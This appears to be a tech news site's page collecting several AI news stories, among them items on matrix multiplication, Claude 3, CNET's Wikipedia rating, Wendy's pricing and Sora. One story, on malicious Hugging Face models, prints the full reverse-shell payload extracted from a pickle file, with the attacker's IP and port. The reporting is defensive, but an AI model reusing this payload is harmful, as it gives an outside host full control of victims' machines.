machine learning

matrix-multiplication-breakthrough-could-lead-to-faster,-more-efficient-ai-models

Matrix multiplication breakthrough could lead to faster, more efficient AI models

The Matrix Revolutions —

At the heart of AI, matrix math has just seen its biggest boost “in more than a decade.”

Futuristic huge technology tunnel and binary data.

Enlarge / When you do math on a computer, you fly through a numerical tunnel like this—figuratively, of course.

Computer scientists have discovered a new way to multiply large matrices faster than ever before by eliminating a previously unknown inefficiency, reports Quanta Magazine. This could eventually accelerate AI models like ChatGPT, which rely heavily on matrix multiplication to function. The findings, presented in two recent papers, have led to what is reported to be the biggest improvement in matrix multiplication efficiency in over a decade.

Multiplying two rectangular number arrays, known as matrix multiplication, plays a crucial role in today’s AI models, including speech and image recognition, chatbots from every major vendor, AI image generators, and video synthesis models like Sora. Beyond AI, matrix math is so important to modern computing (think image processing and data compression) that even slight gains in efficiency could lead to computational and power savings.

Graphics processing units (GPUs) excel in handling matrix multiplication tasks because of their ability to process many calculations at once. They break down large matrix problems into smaller segments and solve them concurrently using an algorithm.

Perfecting that algorithm has been the key to breakthroughs in matrix multiplication efficiency over the past century—even before computers entered the picture. In October 2022, we covered a new technique discovered by a Google DeepMind AI model called AlphaTensor, focusing on practical algorithmic improvements for specific matrix sizes, such as 4×4 matrices.

By contrast, the new research, conducted by Ran Duan and Renfei Zhou of Tsinghua University, Hongxun Wu of the University of California, Berkeley, and by Virginia Vassilevska Williams, Yinzhan Xu, and Zixuan Xu of the Massachusetts Institute of Technology (in a second paper), seeks theoretical enhancements by aiming to lower the complexity exponent, ω, for a broad efficiency gain across all sizes of matrices. Instead of finding immediate, practical solutions like AlphaTensor, the new technique addresses foundational improvements that could transform the efficiency of matrix multiplication on a more general scale.

Approaching the ideal value

The traditional method for multiplying two n-by-n matrices requires n³ separate multiplications. However, the new technique, which improves upon the “laser method” introduced by Volker Strassen in 1986, has reduced the upper bound of the exponent (denoted as the aforementioned ω), bringing it closer to the ideal value of 2, which represents the theoretical minimum number of operations needed.

The traditional way of multiplying two grids full of numbers could require doing the math up to 27 times for a grid that’s 3×3. But with these advancements, the process is accelerated by significantly reducing the multiplication steps required. The effort minimizes the operations to slightly over twice the size of one side of the grid squared, adjusted by a factor of 2.371552. This is a big deal because it nearly achieves the optimal efficiency of doubling the square’s dimensions, which is the fastest we could ever hope to do it.

Here’s a brief recap of events. In 2020, Josh Alman and Williams introduced a significant improvement in matrix multiplication efficiency by establishing a new upper bound for ω at approximately 2.3728596. In November 2023, Duan and Zhou revealed a method that addressed an inefficiency within the laser method, setting a new upper bound for ω at approximately 2.371866. The achievement marked the most substantial progress in the field since 2010. But just two months later, Williams and her team published a second paper that detailed optimizations that reduced the upper bound for ω to 2.371552.

The 2023 breakthrough stemmed from the discovery of a “hidden loss” in the laser method, where useful blocks of data were unintentionally discarded. In the context of matrix multiplication, “blocks” refer to smaller segments that a large matrix is divided into for easier processing, and “block labeling” is the technique of categorizing these segments to identify which ones to keep and which to discard, optimizing the multiplication process for speed and efficiency. By modifying the way the laser method labels blocks, the researchers were able to reduce waste and improve efficiency significantly.

While the reduction of the omega constant might appear minor at first glance—reducing the 2020 record value by 0.0013076—the cumulative work of Duan, Zhou, and Williams represents the most substantial progress in the field observed since 2010.

“This is a major technical breakthrough,” said William Kuszmaul, a theoretical computer scientist at Harvard University, as quoted by Quanta Magazine. “It is the biggest improvement in matrix multiplication we’ve seen in more than a decade.”

While further progress is expected, there are limitations to the current approach. Researchers believe that understanding the problem more deeply will lead to the development of even better algorithms. As Zhou stated in the Quanta report, “People are still in the very early stages of understanding this age-old problem.”

So what are the practical applications? For AI models, a reduction in computational steps for matrix math could translate into faster training times and more efficient execution of tasks. It could enable more complex models to be trained more quickly, potentially leading to advancements in AI capabilities and the development of more sophisticated AI applications. Additionally, efficiency improvement could make AI technologies more accessible by lowering the computational power and energy consumption required for these tasks. That would also reduce AI’s environmental impact.

The exact impact on the speed of AI models depends on the specific architecture of the AI system and how heavily its tasks rely on matrix multiplication. Advancements in algorithmic efficiency often need to be coupled with hardware optimizations to fully realize potential speed gains. But still, as improvements in algorithmic techniques add up over time, AI will get faster.

Matrix multiplication breakthrough could lead to faster, more efficient AI models Read More »

us-gov’t-announces-arrest-of-former-google-engineer-for-alleged-ai-trade-secret-theft

US gov’t announces arrest of former Google engineer for alleged AI trade secret theft

Don’t trade the secrets dept. —

Linwei Ding faces four counts of trade secret theft, each with a potential 10-year prison term.

A Google sign stands in front of the building on the sidelines of the opening of the new Google Cloud data center in Hesse, Hanau, opened in October 2023.

Enlarge / A Google sign stands in front of the building on the sidelines of the opening of the new Google Cloud data center in Hesse, Hanau, opened in October 2023.

On Wednesday, authorities arrested former Google software engineer Linwei Ding in Newark, California, on charges of stealing AI trade secrets from the company. The US Department of Justice alleges that Ding, a Chinese national, committed the theft while secretly working with two China-based companies.

According to the indictment, Ding, who was hired by Google in 2019 and had access to confidential information about the company’s data centers, began uploading hundreds of files into a personal Google Cloud account two years ago.

The trade secrets Ding allegedly copied contained “detailed information about the architecture and functionality of GPU and TPU chips and systems, the software that allows the chips to communicate and execute tasks, and the software that orchestrates thousands of chips into a supercomputer capable of executing at the cutting edge of machine learning and AI technology,” according to the indictment.

Shortly after the alleged theft began, Ding was offered the position of chief technology officer at an early-stage technology company in China that touted its use of AI technology. The company offered him a monthly salary of about $14,800, plus an annual bonus and company stock. Ding reportedly traveled to China, participated in investor meetings, and sought to raise capital for the company.

Investigators reviewed surveillance camera footage that showed another employee scanning Ding’s name badge at the entrance of the building where Ding worked at Google, making him look like he was working from his office when he was actually traveling.

Ding also founded and served as the chief executive of a separate China-based startup company that aspired to train “large AI models powered by supercomputing chips,” according to the indictment. Prosecutors say Ding did not disclose either affiliation to Google, which described him as a junior employee. He resigned from Google on December 26 of last year.

The FBI served a search warrant at Ding’s home in January, seizing his electronic devices and later executing an additional warrant for the contents of his personal accounts. Authorities found more than 500 unique files of confidential information that Ding allegedly stole from Google. The indictment says that Ding copied the files into the Apple Notes application on his Google-issued Apple MacBook, then converted the Apple Notes into PDF files and uploaded them to an external account to evade detection.

“We have strict safeguards to prevent the theft of our confidential commercial information and trade secrets,” Google spokesperson José Castañeda told Ars Technica. “After an investigation, we found that this employee stole numerous documents, and we quickly referred the case to law enforcement. We are grateful to the FBI for helping protect our information and will continue cooperating with them closely.”

Attorney General Merrick Garland announced the case against the 38-year-old at an American Bar Association conference in San Francisco. Ding faces four counts of federal trade secret theft, each carrying a potential sentence of up to 10 years in prison.

US gov’t announces arrest of former Google engineer for alleged AI trade secret theft Read More »

some-teachers-are-now-using-chatgpt-to-grade-papers

Some teachers are now using ChatGPT to grade papers

robots in disguise —

New AI tools aim to help with grading, lesson plans—but may have serious drawbacks.

An elementary-school-aged child touching a robot hand.

In a notable shift toward sanctioned use of AI in schools, some educators in grades 3–12 are now using a ChatGPT-powered grading tool called Writable, reports Axios. The tool, acquired last summer by Houghton Mifflin Harcourt, is designed to streamline the grading process, potentially offering time-saving benefits for teachers. But is it a good idea to outsource critical feedback to a machine?

Writable lets teachers submit student essays for analysis by ChatGPT, which then provides commentary and observations on the work. The AI-generated feedback goes to teacher review before being passed on to students so that a human remains in the loop.

“Make feedback more actionable with AI suggestions delivered to teachers as the writing happens,” Writable promises on its AI website. “Target specific areas for improvement with powerful, rubric-aligned comments, and save grading time with AI-generated draft scores.” The service also provides AI-written writing-prompt suggestions: “Input any topic and instantly receive unique prompts that engage students and are tailored to your classroom needs.”

Writable can reportedly help a teacher develop a curriculum, although we have not tried the functionality ourselves. “Once in Writable you can also use AI to create curriculum units based on any novel, generate essays, multi-section assignments, multiple-choice questions, and more, all with included answer keys,” the site claims.

The reliance on AI for grading will likely have drawbacks. Automated grading might encourage some educators to take shortcuts, diminishing the value of personalized feedback. Over time, the augmentation from AI may allow teachers to be less familiar with the material they are teaching. The use of cloud-based AI tools may have privacy implications for teachers and students. Also, ChatGPT isn’t a perfect analyst. It can get things wrong and potentially confabulate (make up) false information, possibly misinterpret a student’s work, or provide erroneous information in lesson plans.

Yet, as Axios reports, proponents assert that AI grading tools like Writable may free up valuable time for teachers, enabling them to focus on more creative and impactful teaching activities. The company selling Writable promotes it as a way to empower educators, supposedly offering them the flexibility to allocate more time to direct student interaction and personalized teaching. Of course, without an in-depth critical review, all claims should be taken with a huge grain of salt.

Amid these discussions, there’s a divide among parents regarding the use of AI in evaluating students’ academic performance. A recent poll of parents revealed mixed opinions, with nearly half of the respondents open to the idea of AI-assisted grading.

As the generative AI craze permeates every space, it’s no surprise that Writable isn’t the only AI-powered grading tool on the market. Others include Crowdmark, Gradescope, and EssayGrader. McGraw Hill is reportedly developing similar technology aimed at enhancing teacher assessment and feedback.

Some teachers are now using ChatGPT to grade papers Read More »

openai-clarifies-the-meaning-of-“open”-in-its-name,-responding-to-musk-lawsuit

OpenAI clarifies the meaning of “open” in its name, responding to Musk lawsuit

The OpenAI logo as an opening to a red brick wall.

Enlarge (credit: Benj Edwards / Getty Images)

On Tuesday, OpenAI published a blog post titled “OpenAI and Elon Musk” in response to a lawsuit Musk filed last week. The ChatGPT maker shared several archived emails from Musk that suggest he once supported a pivot away from open source practices in the company’s quest to develop artificial general intelligence (AGI). The selected emails also imply that the “open” in “OpenAI” means that the ultimate result of its research into AGI should be open to everyone but not necessarily “open source” along the way.

In one telling exchange from January 2016 shared by the company, OpenAI Chief Scientist Illya Sutskever wrote, “As we get closer to building AI, it will make sense to start being less open. The Open in openAI means that everyone should benefit from the fruits of AI after its built, but it’s totally OK to not share the science (even though sharing everything is definitely the right strategy in the short and possibly medium term for recruitment purposes).”

In response, Musk replied simply, “Yup.”

Read 8 remaining paragraphs | Comments

OpenAI clarifies the meaning of “open” in its name, responding to Musk lawsuit Read More »

the-ai-wars-heat-up-with-claude-3,-claimed-to-have-“near-human”-abilities

The AI wars heat up with Claude 3, claimed to have “near-human” abilities

The Anthropic Claude 3 logo.

Enlarge / The Anthropic Claude 3 logo.

On Monday, Anthropic released Claude 3, a family of three AI language models similar to those that power ChatGPT. Anthropic claims the models set new industry benchmarks across a range of cognitive tasks, even approaching “near-human” capability in some cases. It’s available now through Anthropic’s website, with the most powerful model being subscription-only. It’s also available via API for developers.

Claude 3’s three models represent increasing complexity and parameter count: Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Sonnet powers the Claude.ai chatbot now for free with an email sign-in. But as mentioned above, Opus is only available through Anthropic’s web chat interface if you pay $20 a month for “Claude Pro,” a subscription service offered through the Anthropic website. All three feature a 200,000-token context window. (The context window is the number of tokens—fragments of a word—that an AI language model can process at once.)

We covered the launch of Claude in March 2023 and Claude 2 in July that same year. Each time, Anthropic fell slightly behind OpenAI’s best models in capability while surpassing them in terms of context window length. With Claude 3, Anthropic has perhaps finally caught up with OpenAI’s released models in terms of performance, although there is no consensus among experts yet—and the presentation of AI benchmarks is notoriously prone to cherry-picking.

A Claude 3 benchmark chart provided by Anthropic.

Enlarge / A Claude 3 benchmark chart provided by Anthropic.

Claude 3 reportedly demonstrates advanced performance across various cognitive tasks, including reasoning, expert knowledge, mathematics, and language fluency. (Despite the lack of consensus over whether large language models “know” or “reason,” the AI research community commonly uses those terms.) The company claims that the Opus model, the most capable of the three, exhibits “near-human levels of comprehension and fluency on complex tasks.”

That’s quite a heady claim and deserves to be parsed more carefully. It’s probably true that Opus is “near-human” on some specific benchmarks, but that doesn’t mean that Opus is a general intelligence like a human (consider that pocket calculators are superhuman at math). So, it’s a purposely eye-catching claim that can be watered down with qualifications.

According to Anthropic, Claude 3 Opus beats GPT-4 on 10 AI benchmarks, including MMLU (undergraduate level knowledge), GSM8K (grade school math), HumanEval (coding), and the colorfully named HellaSwag (common knowledge). Several of the wins are very narrow, such as 86.8 percent for Opus vs. 86.4 percent on a five-shot trial of MMLU, and some gaps are big, such as 84.9 percent on HumanEval over GPT-4’s 67.0 percent. But what that might mean, exactly, to you as a customer is difficult to say.

“As always, LLM benchmarks should be treated with a little bit of suspicion,” says AI researcher Simon Willison, who spoke with Ars about Claude 3. “How well a model performs on benchmarks doesn’t tell you much about how the model ‘feels’ to use. But this is still a huge deal—no other model has beaten GPT-4 on a range of widely used benchmarks like this.”

The AI wars heat up with Claude 3, claimed to have “near-human” abilities Read More »

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »

ai-generated-articles-prompt-wikipedia-to-downgrade-cnet’s-reliability-rating

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI —

Futurism report highlights the reputational cost of publishing AI-generated content.

The CNET logo on a smartphone screen.

Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list currently features three entries for CNET broken into three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, where Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards” and saying there is no consensus about reliability; and (3) between November 2022 and present, where Wikipedia currently considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET's reliability ratings, as found on Wikipedia's

Enlarge / A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement that claims that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024 at 9: 30am to reflect fixes in the date ranges for CNET on the Perennial Sources page.

AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating Read More »

microsoft-partners-with-openai-rival-mistral-for-ai-models,-drawing-eu-scrutiny

Microsoft partners with OpenAI-rival Mistral for AI models, drawing EU scrutiny

The European Approach —

15M euro investment comes as Microsoft hosts Mistral’s GPT-4 alternatives on Azure.

Velib bicycles are parked in front of the the U.S. computer and micro-computing company headquarters Microsoft on January 25, 2023 in Issy-les-Moulineaux, France.

On Monday, Microsoft announced plans to offer AI models from Mistral through its Azure cloud computing platform, which came in conjunction with a 15 million euro non-equity investment in the French firm, which is often seen as a European rival to OpenAI. Since then, the investment deal has faced scrutiny from European Union regulators.

Microsoft’s deal with Mistral, known for its large language models akin to OpenAI’s GPT-4 (which powers the subscription versions of ChatGPT), marks a notable expansion of its AI portfolio at a time when its well-known investment in California-based OpenAI has raised regulatory eyebrows. The new deal with Mistral drew particular attention from regulators because Microsoft’s investment could convert into equity (partial ownership of Mistral as a company) during Mistral’s next funding round.

The development has intensified ongoing investigations into Microsoft’s practices, particularly related to the tech giant’s dominance in the cloud computing sector. According to Reuters, EU lawmakers have voiced concerns that Mistral’s recent lobbying for looser AI regulations might have been influenced by its relationship with Microsoft. These apprehensions are compounded by the French government’s denial of prior knowledge of the deal, despite earlier lobbying for more lenient AI laws in Europe. The situation underscores the complex interplay between national interests, corporate influence, and regulatory oversight in the rapidly evolving AI landscape.

Avoiding American influence

The EU’s reaction to the Microsoft-Mistral deal reflects broader tensions over the role of Big Tech companies in shaping the future of AI and their potential to stifle competition. Calls for a thorough investigation into Microsoft and Mistral’s partnership have been echoed across the continent, according to Reuters, with some lawmakers accusing the firms of attempting to undermine European legislative efforts aimed at ensuring a fair and competitive digital market.

The controversy also touches on the broader debate about “European champions” in the tech industry. France, along with Germany and Italy, had advocated for regulatory exemptions to protect European startups. However, the Microsoft-Mistral deal has led some, like MEP Kim van Sparrentak, to question the motives behind these exemptions, suggesting they might have inadvertently favored American Big Tech interests.

“That story seems to have been a front for American-influenced Big Tech lobby,” said Sparrentak, as quoted by Reuters. Sparrentak has been a key architect of the EU’s AI Act, which has not yet been passed. “The Act almost collapsed under the guise of no rules for ‘European champions,’ and now look. European regulators have been played.”

MEP Alexandra Geese also expressed concerns over the concentration of money and power resulting from such partnerships, calling for an investigation. Max von Thun, Europe director at the Open Markets Institute, emphasized the urgency of investigating the partnership, criticizing Mistral’s reported attempts to influence the AI Act.

Also on Monday, amid the partnership news, Mistral announced Mistral Large, a new large language model (LLM) that Mistral says “ranks directly after GPT-4 based on standard benchmarks.” Mistral has previously released several open-weights AI models that have made news for their capabilities, but Mistral Large will be a closed model only available to customers through an API.

Microsoft partners with OpenAI-rival Mistral for AI models, drawing EU scrutiny Read More »

wendy’s-will-experiment-with-dynamic-surge-pricing-for-food-in-2025

Wendy’s will experiment with dynamic surge pricing for food in 2025

Sir, this is Wendy’s new AI-powered menu —

Surge pricing test next year means your cheeseburger may get more expensive at 6 pm.

A view of a Wendy's store on August 9, 2023 in Nanuet, New York.

Enlarge / A view of a Wendy’s store on August 9, 2023, in Nanuet, New York.

American fast food chain Wendy’s is planning to test dynamic pricing and AI menu features in 2025, reports Nation’s Restaurant News and Food & Wine. This means that prices for food items will automatically change throughout the day depending on demand, similar to “surge pricing” in rideshare apps like Uber and Lyft. The initiative was disclosed by Kirk Tanner, the CEO and president of Wendy’s, in a recent discussion with analysts.

According to Tanner, Wendy’s plans to invest approximately $20 million to install digital menu boards capable of displaying these real-time variable prices across all of its company-operated locations in the United States. An additional $10 million is earmarked over two years to enhance Wendy’s global system, which aims to improve order accuracy and upsell other menu items.

In conversation with Food & Wine, a spokesperson for Wendy’s confirmed the company’s commitment to this pricing strategy, describing it as part of a broader effort to grow its digital business. “Beginning as early as 2025, we will begin testing a variety of enhanced features on these digital menuboards like dynamic pricing, different offerings in certain parts of the day, AI-enabled menu changes and suggestive selling based on factors such as weather,” they said. “Dynamic pricing can allow Wendy’s to be competitive and flexible with pricing, motivate customers to visit and provide them with the food they love at a great value. We will test a number of features that we think will provide an enhanced customer and crew experience.”

A Wendy's drive-through menu as seen in 2023 during the FreshAI rollout.

Enlarge / A Wendy’s drive-through menu as seen in 2023 during the FreshAI rollout.

Wendy’s is not the first business to explore dynamic pricing—it’s a common practice in several industries, including hospitality, retail, airline travel, and the aforementioned rideshare apps. Its application in the fast-food sector is largely untested, and it’s uncertain how customers will react. However, a few other restaurants have tested the method and have experienced favorable results. “For us, it was all about consumer reaction,” Faizan Khan, a Dog Haus franchise owner, told Food & Wine. “The concern was if you’re going to raise prices, you’re going to sell less product, and it turns out that really wasn’t the case.”

The price-change plans are the latest in a series of moves designed to modernize Wendy’s business using technology—and increase profits. In 2023, Wendy’s began testing FreshAI, a system designed to take orders with a conversational AI bot, potentially replacing human workers in the process. In his discussion, Tanner also discussed “AI-enabled menu changes” and “suggestive selling” without elaboration, though the Wendy’s spokesperson remarked that suggestive selling may automatically emphasize some items based dynamically on local weather conditions, such as trying to sell cold drinks on a hot day.

If Wendy’s goes through with its plan, it’s unclear how the dynamic pricing will affect food delivery apps such as Uber Eats or Doordash, or even the Wendy’s mobile app. Presumably, third-party apps will need a way to link into Wendy’s dynamic price system (Wendy’s API anyone?).

In other news, Wendy’s is also testing “Saucy Nuggets” in a small number of restaurants near the chain’s Ohio headquarters. Refreshingly, they have nothing to do with AI.

Wendy’s will experiment with dynamic surge pricing for food in 2025 Read More »

tyler-perry-puts-$800-million-studio-expansion-on-hold-because-of-openai’s-sora

Tyler Perry puts $800 million studio expansion on hold because of OpenAI’s Sora

The Synthetic Screen —

Perry: Mind-blowing AI video-generation tools “will touch every corner of our industry.”

Tyler Perry in 2022.

Enlarge / Tyler Perry in 2022.

In an interview with The Hollywood Reporter published Thursday, filmmaker Tyler Perry spoke about his concerns related to the impact of AI video synthesis on entertainment industry jobs. In particular, he revealed that he has suspended a planned $800 million expansion of his production studio after seeing what OpenAI’s recently announced AI video generator Sora can do.

“I have been watching AI very closely,” Perry said in the interview. “I was in the middle of, and have been planning for the last four years… an $800 million expansion at the studio, which would’ve increased the backlot a tremendous size—we were adding 12 more soundstages. All of that is currently and indefinitely on hold because of Sora and what I’m seeing. I had gotten word over the last year or so that this was coming, but I had no idea until I saw recently the demonstrations of what it’s able to do. It’s shocking to me.”

OpenAI, the company behind ChatGPT, revealed a preview of Sora’s capabilities last week. Sora is a text-to-video synthesis model, and it uses a neural network—previously trained on video examples—that can take written descriptions of a scene and turn them into high-definition video clips up to 60 seconds long. Sora caused shock in the tech world because it appeared to surpass other AI video generators in capability dramatically. It seems that a similar shock also rippled into adjacent professional fields. “Being told that it can do all of these things is one thing, but actually seeing the capabilities, it was mind-blowing,” Perry said in the interview.

Tyler Perry Studios, which the actor and producer acquired in 2015, is a 330-acre lot located in Atlanta and is one of the largest film production facilities in the United States. Perry, who is perhaps best known for his series of Madea films, says that technology like Sora worries him because it could make the need for building sets or traveling to locations obsolete. He cites examples of virtual shooting in the snow of Colorado or on the Moon just by using a text prompt. “This AI can generate it like nothing.” The technology may represent a radical reduction in costs necessary to create a film, and that will likely put entertainment industry jobs in jeopardy.

“It makes me worry so much about all of the people in the business,” he told The Hollywood Reporter. “Because as I was looking at it, I immediately started thinking of everyone in the industry who would be affected by this, including actors and grip and electric and transportation and sound and editors, and looking at this, I’m thinking this will touch every corner of our industry.”

You can read the full interview at The Hollywood Reporter, which did an excellent job of covering Perry’s thoughts on a technology that may end up fundamentally disrupting Hollywood. To his mind, AI tech poses an existential risk to the entertainment industry that it can’t ignore: “There’s got to be some sort of regulations in order to protect us. If not, I just don’t see how we survive.”

Perry also looks beyond Hollywood and says that it’s not just filmmaking that needs to be on alert, and he calls for government action to help retain human employment in the age of AI. “If you look at it across the world, how it’s changing so quickly, I’m hoping that there’s a whole government approach to help everyone be able to sustain.”

Tyler Perry puts $800 million studio expansion on hold because of OpenAI’s Sora Read More »

stability-announces-stable-diffusion-3,-a-next-gen-ai-image-generator

Stability announces Stable Diffusion 3, a next-gen AI image generator

Pics and it didn’t happen —

SD3 may bring DALL-E-like prompt fidelity to an open-weights image-synthesis model.

Stable Diffusion 3 generation with the prompt: studio photograph closeup of a chameleon over a black background.

Enlarge / Stable Diffusion 3 generation with the prompt: studio photograph closeup of a chameleon over a black background.

On Thursday, Stability AI announced Stable Diffusion 3, an open-weights next-generation image-synthesis model. It follows its predecessors by reportedly generating detailed, multi-subject images with improved quality and accuracy in text generation. The brief announcement was not accompanied by a public demo, but Stability is opening up a waitlist today for those who would like to try it.

Stability says that its Stable Diffusion 3 family of models (which takes text descriptions called “prompts” and turns them into matching images) range in size from 800 million to 8 billion parameters. The size range accommodates allowing different versions of the model to run locally on a variety of devices—from smartphones to servers. Parameter size roughly corresponds to model capability in terms of how much detail it can generate. Larger models also require more VRAM on GPU accelerators to run.

Since 2022, we’ve seen Stability launch a progression of AI image-generation models: Stable Diffusion 1.4, 1.5, 2.0, 2.1, XL, XL Turbo, and now 3. Stability has made a name for itself as providing a more open alternative to proprietary image-synthesis models like OpenAI’s DALL-E 3, though not without controversy due to the use of copyrighted training data, bias, and the potential for abuse. (This has led to lawsuits that are unresolved.) Stable Diffusion models have been open-weights and source-available, which means the models can be run locally and fine-tuned to change their outputs.

  • Stable Diffusion 3 generation with the prompt: Epic anime artwork of a wizard atop a mountain at night casting a cosmic spell into the dark sky that says “Stable Diffusion 3” made out of colorful energy.

  • An AI-generated image of a grandma wearing a “Go big or go home sweatshirt” generated by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: Three transparent glass bottles on a wooden table. The one on the left has red liquid and the number 1. The one in the middle has blue liquid and the number 2. The one on the right has green liquid and the number 3.

  • An AI-generated image created by Stable Diffusion 3.

  • Stable Diffusion 3 generation with the prompt: A horse balancing on top of a colorful ball in a field with green grass and a mountain in the background.

  • Stable Diffusion 3 generation with the prompt: Moody still life of assorted pumpkins.

  • Stable Diffusion 3 generation with the prompt: a painting of an astronaut riding a pig wearing a tutu holding a pink umbrella, on the ground next to the pig is a robin bird wearing a top hat, in the corner are the words “stable diffusion.”

  • Stable Diffusion 3 generation with the prompt: Resting on the kitchen table is an embroidered cloth with the text ‘good night’ and an embroidered baby tiger. Next to the cloth there is a lit candle. The lighting is dim and dramatic.

  • Stable Diffusion 3 generation with the prompt: Photo of an 90’s desktop computer on a work desk, on the computer screen it says “welcome”. On the wall in the background we see beautiful graffiti with the text “SD3” very large on the wall.

As far as tech improvements are concerned, Stability CEO Emad Mostaque wrote on X, “This uses a new type of diffusion transformer (similar to Sora) combined with flow matching and other improvements. This takes advantage of transformer improvements & can not only scale further but accept multimodal inputs.”

